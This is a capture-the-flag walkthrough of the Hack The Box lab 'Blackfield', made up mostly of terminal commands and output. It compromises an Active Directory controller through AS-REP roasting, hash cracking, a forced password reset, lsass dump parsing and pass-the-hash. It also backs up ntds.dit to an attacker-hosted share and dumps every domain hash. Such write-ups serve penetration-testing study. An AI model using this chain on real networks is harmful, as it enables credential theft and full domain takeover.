HTB Blackfield done
Blackfield
OS:
Windows
Technology:
Active Directory
SMB
LDAP
IP Address:
10.10.10.192
Open ports:
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-06 17:32:16Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Users and pass:
support
#00^BlackKnight
svc_backup
Pwn3d!
Nmap
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo nmap -Pn -A -sV --script=default,vuln -p- --open -oA 10.10.10.192_nmap_vulns 10.10.10.192
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-06 05:29 EDT
Nmap scan report for 10.10.10.192
Host is up (0.038s latency).
Not shown: 65527 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-04-06 17:32:16Z)
135/tcp open msrpc Microsoft Windows RPC
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: BLACKFIELD.local0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_smb-vuln-ms10-054: false
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2023-04-06T17:32:26
|_ start_date: N/A
|_samba-vuln-cve-2012-1182: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_smb-vuln-ms10-061: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
TRACEROUTE (using port 135/tcp)
HOP RTT ADDRESS
1 37.75 ms 10.10.14.1
2 37.78 ms 10.10.10.192
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 448.65 seconds
Add hostname to /etc/hosts
┌──(root㉿kali)-[~]
└─# echo "10.10.10.192 blackfield.local" >> /etc/hosts
List share folder
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbmap -u guest -H 10.10.10.192
[+] IP: 10.10.10.192:445 Name: 10.10.10.192
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic NO ACCESS Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
profiles$ READ ONLY
SYSVOL NO ACCESS Logon server share
List content of share folder "profiles$"
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbclient -N \\\\10.10.10.192\\profiles$ -c ls | awk '{print $1}' > smb_users.txt
Spray the users with Kerberos pre-authentication disabled
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ /home/kali/.local/bin/GetNPUsers.py blackfield.local/ -no-pass -usersfile smb_users.txt -dc-ip 10.10.10.192 | grep -v 'KDC_ERR_C_PRINCIPAL_UNKNOWN' | tee kerberos_preauth_disable_users
/usr/share/offsec-awae-wheels/pyOpenSSL-19.1.0-py2.py3-none-any.whl/OpenSSL/crypto.py:12: CryptographyDeprecationWarning: Python 2 is no longer supported by the Python core team. Support for it is now deprecated in cryptography, and will be removed in the next release.
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] User audit2020 doesn't have UF_DONT_REQUIRE_PREAUTH set
[email protected]:d8777c4e3bc6a689e9c1804df5233acb$cf181be7f186b65319e96085e89634181a59dd5af180098bab08f19f9f994477b710aebbec578aaf74186361afc390828e73e406df2f67b0fc8f27d53648a4f8a68bcca3dfa2d2fbc291079a6d43ffbe274c1f86fe11841a9e4b3ded4dac712a877d78b55263858f7d33f38cd775097711540adde2d0f15c3440f2feb5f714f6890cb623d1c3d33ba250c4752473c05db51cea08b5852ca984ae13fb4bf2412ff3b0f8c31c1dae5fd06227816d54dae74fedaa08356dffcc9e570e3337e18164b943477ffdad2de5715b79049b4bd611fe6fd913f8f4a7a77c3b446e4c2df4a2648e13457aa789633220d32f3becacc6d739d99f
[-] User svc_backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] invalid principal syntax
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
Cracking krb5asrep hash
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ hashcat -m 18200 krb5asrep_hash /usr/share/wordlists/rockyou.txt --show
[email protected]:d8777c4e3bc6a689e9c1804df5233acb$cf181be7f186b65319e96085e89634181a59dd5af180098bab08f19f9f994477b710aebbec578aaf74186361afc390828e73e406df2f67b0fc8f27d53648a4f8a68bcca3dfa2d2fbc291079a6d43ffbe274c1f86fe11841a9e4b3ded4dac712a877d78b55263858f7d33f38cd775097711540adde2d0f15c3440f2feb5f714f6890cb623d1c3d33ba250c4752473c05db51cea08b5852ca984ae13fb4bf2412ff3b0f8c31c1dae5fd06227816d54dae74fedaa08356dffcc9e570e3337e18164b943477ffdad2de5715b79049b4bd611fe6fd913f8f4a7a77c3b446e4c2df4a2648e13457aa789633220d32f3becacc6d739d99f:#00^BlackKnight
Run Bloodhound
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$apt install bloodhound
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$pip3 install bloodhound
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ bloodhound-python -u support -p '#00^BlackKnight' -d blackfield.local -ns 10.10.10.192 -c DcOnly | tee bloodhound.txt
INFO: Found AD domain: blackfield.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Connecting to LDAP server: dc01.blackfield.local
INFO: Kerberos auth to LDAP failed, trying NTLM
INFO: Found 316 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 18 computers
INFO: Found 0 trusts
INFO: Done in 00M 05S
Read privilages for support user from Bloodhound
Setup password for user audit2020 by rpcclient
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ rpcclient -U blackfield/support 10.10.10.192
Password for [BLACKFIELD\support]:
rpcclient $> setuserinfo audit2020 23 PupaJana123
rpcclient $> exit
List SMB shares for user audit2020
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbmap -u audit2020 -p PupaJana123 -H 10.10.10.192
[+] IP: 10.10.10.192:445 Name: blackfield.local
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
forensic READ ONLY Forensic / Audit share.
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
profiles$ READ ONLY
SYSVOL READ ONLY Logon server share
List SMB shares for user audit2020 - v2
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ crackmapexec smb 10.10.10.192 -u audit2020 -p 'PupaJana123' --shares
SMB 10.10.10.192 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:BLACKFIELD.local) (signing:True) (SMBv1:False)
SMB 10.10.10.192 445 DC01 [+] BLACKFIELD.local\audit2020:PupaJana123
SMB 10.10.10.192 445 DC01 [+] Enumerated shares
SMB 10.10.10.192 445 DC01 Share Permissions Remark
SMB 10.10.10.192 445 DC01 ----- ----------- ------
SMB 10.10.10.192 445 DC01 ADMIN$ Remote Admin
SMB 10.10.10.192 445 DC01 C$ Default share
SMB 10.10.10.192 445 DC01 forensic READ Forensic / Audit share.
SMB 10.10.10.192 445 DC01 IPC$ READ Remote IPC
SMB 10.10.10.192 445 DC01 NETLOGON READ Logon server share
SMB 10.10.10.192 445 DC01 profiles$ READ
SMB 10.10.10.192 445 DC01 SYSVOL READ Logon server share
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ smbclient -U audit2020 \\\\10.10.10.192\\forensic
Password for [WORKGROUP\audit2020]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Feb 23 08:03:16 2020
.. D 0 Sun Feb 23 08:03:16 2020
commands_output D 0 Sun Feb 23 13:14:37 2020
memory_analysis D 0 Thu May 28 16:28:33 2020
tools D 0 Sun Feb 23 08:39:08 2020
5102079 blocks of size 4096. 1688568 blocks available
smb: \> cd memory_analysis\
smb: \memory_analysis\> dir
. D 0 Thu May 28 16:28:33 2020
.. D 0 Thu May 28 16:28:33 2020
conhost.zip A 37876530 Thu May 28 16:25:36 2020
ctfmon.zip A 24962333 Thu May 28 16:25:45 2020
dfsrs.zip A 23993305 Thu May 28 16:25:54 2020
dllhost.zip A 18366396 Thu May 28 16:26:04 2020
ismserv.zip A 8810157 Thu May 28 16:26:13 2020
lsass.zip A 41936098 Thu May 28 16:25:08 2020
mmc.zip A 64288607 Thu May 28 16:25:25 2020
RuntimeBroker.zip A 13332174 Thu May 28 16:26:24 2020
ServerManager.zip A 131983313 Thu May 28 16:26:49 2020
sihost.zip A 33141744 Thu May 28 16:27:00 2020
smartscreen.zip A 33756344 Thu May 28 16:27:11 2020
svchost.zip A 14408833 Thu May 28 16:27:19 2020
taskhostw.zip A 34631412 Thu May 28 16:27:30 2020
winlogon.zip A 14255089 Thu May 28 16:27:38 2020
wlms.zip A 4067425 Thu May 28 16:27:44 2020
WmiPrvSE.zip A 18303252 Thu May 28 16:27:53 2020
5102079 blocks of size 4096. 1688568 blocks available
smb: \memory_analysis\> get lsass.zip
getting file \memory_analysis\lsass.zip of size 41936098 as lsass.zip (1136.6 KiloBytes/sec) (average 1136.6 KiloBytes/sec)
smb: \memory_analysis\>
┌──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield/lsass]
└─$ pypykatz lsa minidump lsass.DMP | tee lsass_clear_text_dump
INFO:pypykatz:Parsing file lsass.DMP
FILE: ======== lsass.DMP =======
== LogonSession ==
authentication_id 406458 (633ba)
session_id 2
username svc_backup
domainname BLACKFIELD
logon_server DC01
logon_time 2020-02-23T18:00:03.423728+00:00
sid S-1-5-21-4194615774-2175524697-3563712290-1413
luid 406458
== MSV ==
Username: svc_backup
Domain: BLACKFIELD
LM: NA
NT: 9658d1d1dcd9250115e2205d9f48400d
SHA1: 463c13a9a31fc3252c68ba0a44f0221626a33e5c
DPAPI: a03cd8e9d30171f3cfe8caad92fef621
...
Get password for user svc_backup
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ crackmapexec winrm 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
[*] Initializing RDP protocol database
[*] Initializing FTP protocol database
[*] Old configuration file detected, replacing with new version
SMB 10.10.10.192 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:BLACKFIELD.local)
HTTP 10.10.10.192 5985 DC01 [*] http://10.10.10.192:5985/wsman
WINRM 10.10.10.192 5985 DC01 [+] BLACKFIELD.local\svc_backup:9658d1d1dcd9250115e2205d9f48400d (Pwn3d!)
Flag: user.txt
──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ evil-winrm -i 10.10.10.192 -u svc_backup -H 9658d1d1dcd9250115e2205d9f48400d
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_backup\Documents> dir
*Evil-WinRM* PS C:\Users\svc_backup\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> dir
Directory: C:\Users\svc_backup\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 2:26 PM 32 user.txt
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> type user.txt
3920bb317a0bef51027e2852be64b543
*Evil-WinRM* PS C:\Users\svc_backup\Desktop>
Dumping Hashes with WBAdmin
Create share via samba service
[samba]
comment = hacker welcome
path = /mnt/hgfs/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield/samba/
guest ok = yes
read only = no
browsable = yes
force user = smbuser
Create user and samba user
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo adduser smbuser
Adding user `smbuser' ...
Adding new group `smbuser' (1002) ...
Adding new user `smbuser' (1002) with group `smbuser (1002)' ...
Creating home directory `/home/smbuser' ...
Copying files from `/etc/skel' ...
New password:
Retype new password:
passwd: password updated successfully
Changing the user information for smbuser
Enter the new value, or press ENTER for the default
Full Name []:
Room Number []:
Work Phone []:
Home Phone []:
Other []:
Is the information correct? [Y/n] Y
Adding new user `smbuser' to supplemental / extra groups `users' ...
Adding user `smbuser' to group `users' ...
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ sudo smbpasswd -a smbuser
New SMB password:
Retype new SMB password:
Added user smbuser.
Restart smb service
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ systemctl restart smbd.service ; systemctl status smbd.service
● smbd.service - Samba SMB Daemon
Loaded: loaded (/lib/systemd/system/smbd.service; disabled; preset: disabled)
Active: active (running) since Fri 2023-04-07 07:48:18 EDT; 19ms ago
Docs: man:smbd(8)
man:samba(7)
man:smb.conf(5)
Process: 297584 ExecCondition=/usr/share/samba/is-configured smb (code=exited, status=0/SUCCESS)
Process: 297586 ExecStartPre=/usr/share/samba/update-apparmor-samba-profile (code=exited, status=0/SUCCESS)
Main PID: 297590 (smbd)
Status: "smbd: ready to serve connections..."
Tasks: 3 (limit: 10088)
Memory: 5.5M
CPU: 113ms
CGroup: /system.slice/smbd.service
├─297590 /usr/sbin/smbd --foreground --no-process-group
├─297592 /usr/sbin/smbd --foreground --no-process-group
└─297593 /usr/sbin/smbd --foreground --no-process-group
Apr 07 07:48:18 kali systemd[1]: Starting smbd.service - Samba SMB Daemon...
Apr 07 07:48:18 kali systemd[1]: Started smbd.service - Samba SMB Daemon.
Mount smb share on Windows
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> net use l: \\10.10.14.6\samba /user:smbuser dupa
The command completed successfully.
Backup folder ntds
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> echo "Y" | wbadmin start backup -backuptarget:\\10.10.14.6\samba -include:c:\windows\ntds
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Note: The backed up data cannot be securely protected at this destination.
Backups stored on a remote shared folder might be accessible by other
people on the network. You should only save your backups to a location
where you trust the other users who have access to the location or on a
network that has additional security precautions in place.
Retrieving volume information...
This will back up (C:) (Selected Files) to \\10.10.14.6\samba.
Do you want to start the backup operation?
[Y] Yes [N] No Y
The backup operation to \\10.10.14.6\samba is starting.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Creating a shadow copy of the volumes specified for backup...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Scanning the file system...
Please wait while files to backup for volume (C:) are identified.
This might take several minutes.
Found (11) files.
Scanning the file system...
Found (11) files.
Scanning the file system...
Found (11) files.
Scanning the file system...
Found (11) files.
Creating a backup of volume (C:), copied (100%).
Creating a backup of volume (C:), copied (100%).
Summary of the backup operation:
------------------
The backup operation successfully completed.
The backup of volume (C:) completed successfully.
Log of files successfully backed up:
C:\Windows\Logs\WindowsServerBackup\Backup-07-04-2023_18-43-29.log
Recovery ntds.dit from backup
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> wbadmin get versions
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Backup time: 9/21/2020 4:00 PM
Backup location: Network Share labeled \\10.10.14.4\blackfieldA
Version identifier: 09/21/2020-23:00
Can recover: Volume(s), File(s)
Backup time: 4/7/2023 8:13 PM
Backup location: Network Share labeled \\10.10.14.6\samba
Version identifier: 04/08/2023-03:13
Can recover: Volume(s), File(s)
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> echo "Y" | wbadmin start recovery -version:04/08/2023-03:13 -itemtype:file -items:c:\windows\ntds\ntds.dit -recoverytarget:C:\ -notrestoreacl
wbadmin 1.0 - Backup command-line tool
(C) Copyright Microsoft Corporation. All rights reserved.
Retrieving volume information...
You have chosen to recover the file(s) c:\windows\ntds\ntds.dit from the
backup created on 4/7/2023 8:13 PM to C:\.
Preparing to recover files...
Do you want to continue?
[Y] Yes [N] No Y
Running the recovery operation for c:\windows\ntds\ntds.dit, copied (54%).
Currently recovering c:\windows\ntds\ntds.dit.
Successfully recovered c:\windows\ntds\ntds.dit to C:\.
The recovery operation completed.
Summary of the recovery operation:
--------------------
Recovery of c:\windows\ntds\ntds.dit to C:\ successfully completed.
Total bytes recovered: 18.00 MB
Total files recovered: 1
Total files failed: 0
Log of files successfully recovered:
C:\Windows\Logs\WindowsServerBackup\FileRestore-08-04-2023_03-23-42.log
Copy file ntds.dit and system.hive to Kali Linux
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> reg save HKLM\SYSTEM C:\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd C:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd C:
*Evil-WinRM* PS C:\Users\svc_backup\Desktop> cd c:\
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 5/26/2020 5:38 PM PerfLogs
d----- 6/3/2020 9:47 AM profiles
d-r--- 3/19/2020 11:08 AM Program Files
d----- 2/1/2020 11:05 AM Program Files (x86)
d-r--- 2/23/2020 9:16 AM Users
d----- 9/21/2020 4:29 PM Windows
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 4/7/2023 8:13 PM 18874368 ntds.dit
-a---- 4/7/2023 8:36 PM 17600512 system.hive
*Evil-WinRM* PS C:\> copy ntds.dit l:
*Evil-WinRM* PS C:\> copy system.hive l:
*Evil-WinRM* PS C:\> l:
*Evil-WinRM* PS l:\> dir
Directory: l:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 4/7/2023 4:41 AM WindowsImageBackup
------ 4/7/2023 8:13 PM 18874368 ntds.dit
------ 4/7/2023 1:37 PM 17600512 system.hive
──(kali㉿kali)-[/mnt/…/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield/samba]
└─$ /home/kali/.local/bin/secretsdump.py -ntds ntds.dit -system system.hive LOCAL
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Target system bootKey: 0x73d83e56de8961ca9f243e1a49638393
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 35640a3fd5111b93cc50e3b4e255ff8c
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:184fb5e5178480be64824d4cd53b99ee:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:258d1995ab2aa3b000fb319f02250429:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d3c02561bba6ee4ad6cfd024ec8fda5d:::
audit2020:1103:aad3b435b51404eeaad3b435b51404ee:55a7781157b1cc3f809d493ba73f33e0:::
support:1104:aad3b435b51404eeaad3b435b51404ee:cead107bf11ebc28b3e6e90cde6de212:::
...
Flag: root.txt
┌──(kali㉿kali)-[/mnt/…/a/OSCP_PEN-200/PEN-200_vm_to_exam/HTB_Blackfield]
└─$ evil-winrm -i 10.10.10.192 -u Administrator -H 184fb5e5178480be64824d4cd53b99ee
Evil-WinRM shell v3.4
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
blackfield\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/28/2020 4:36 PM 447 notes.txt
-a---- 11/5/2020 8:38 PM 32 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type notes.txt
Mates,
After the domain compromise and computer forensic last week, auditors advised us to:
- change every passwords -- Done.
- change krbtgt password twice -- Done.
- disable auditor's account (audit2020) -- KO.
- use nominative domain admin accounts instead of this one -- KO.
We will probably have to backup & restore things later.
- Mike.
PS: Because the audit report is sensitive, I have encrypted it on the desktop (root.txt)
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
4375a629c7c67c8e29db269060c955cb